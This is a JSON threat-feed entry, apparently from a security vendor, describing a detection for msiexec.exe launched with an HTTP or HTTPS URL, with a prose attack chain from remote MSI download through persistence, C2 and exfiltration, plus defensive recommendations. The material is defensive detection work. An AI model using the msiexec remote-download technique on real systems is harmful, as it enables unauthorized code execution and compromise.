{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/remote-download/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Splunk Enterprise","Splunk Enterprise Security","Splunk Cloud","Network Visibility Module"],"_cs_severities":["high"],"_cs_tags":["endpoint","msiexec","remote-download","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Cisco","Splunk"],"content_html":"\u003cp\u003eThe detection focuses on identifying instances where \u003ccode\u003emsiexec.exe\u003c/code\u003e is used with an HTTP or HTTPS URL in the command line. This behavior is indicative of an attempt to download and execute potentially malicious software from a remote server. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant as it may indicate an attempt to download and execute potentially malicious software from a remote server. If confirmed malicious, this could lead to unauthorized code execution, system compromise, or further malware deployment within the network. The activity is often used to bypass traditional security controls.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access through various means, such as phishing or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages \u003ccode\u003emsiexec.exe\u003c/code\u003e, a legitimate Windows utility, to download a malicious MSI package from a remote HTTP or HTTPS server.\u003c/li\u003e\n\u003cli\u003eThe command line includes a URL pointing to a malicious MSI file hosted on a compromised or attacker-controlled server.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emsiexec.exe\u003c/code\u003e downloads the MSI package to the victim\u0026rsquo;s machine.\u003c/li\u003e\n\u003cli\u003eThe MSI package is executed, potentially installing malware, creating new files, or modifying system settings.\u003c/li\u003e\n\u003cli\u003eThe installed malware establishes persistence through registry keys or scheduled tasks.\u003c/li\u003e\n\u003cli\u003eThe malware initiates command and control (C2) communication to receive further instructions.\u003c/li\u003e\n\u003cli\u003eThe attacker performs actions on the objective such as data exfiltration or lateral movement within the compromised network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized code execution, system compromise, or further malware deployment within the network. The use of \u003ccode\u003emsiexec.exe\u003c/code\u003e for remote downloads can bypass traditional security controls, allowing attackers to deliver and execute malicious payloads undetected. The dfirreport.com article references data exfiltration following exploitation via MSIExec.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to activate the rules below, capturing command-line details (Sysmon EventID 1).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for connections originating from \u003ccode\u003emsiexec.exe\u003c/code\u003e to external HTTP/HTTPS URLs (Network Visibility Module Flow Data).\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of \u003ccode\u003emsiexec.exe\u003c/code\u003e executing with command-line arguments containing HTTP or HTTPS URLs.\u003c/li\u003e\n\u003cli\u003eFilter false positives by destination or parent process as needed based on your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:00:00Z","date_published":"2024-01-03T15:00:00Z","id":"/briefs/2024-01-03-msiexec-remote-download/","summary":"The analytic detects the execution of msiexec.exe with an HTTP or HTTPS URL, which indicates an attempt to download and execute potentially malicious software from a remote server, leading to potential unauthorized code execution, system compromise, or malware deployment.","title":"Suspicious MSIExec Remote Download","url":"https://feed.craftedsignal.io/briefs/2024-01-03-msiexec-remote-download/"}],"language":"en","title":"CraftedSignal Threat Feed — Remote-Download","version":"https://jsonfeed.org/version/1.1"}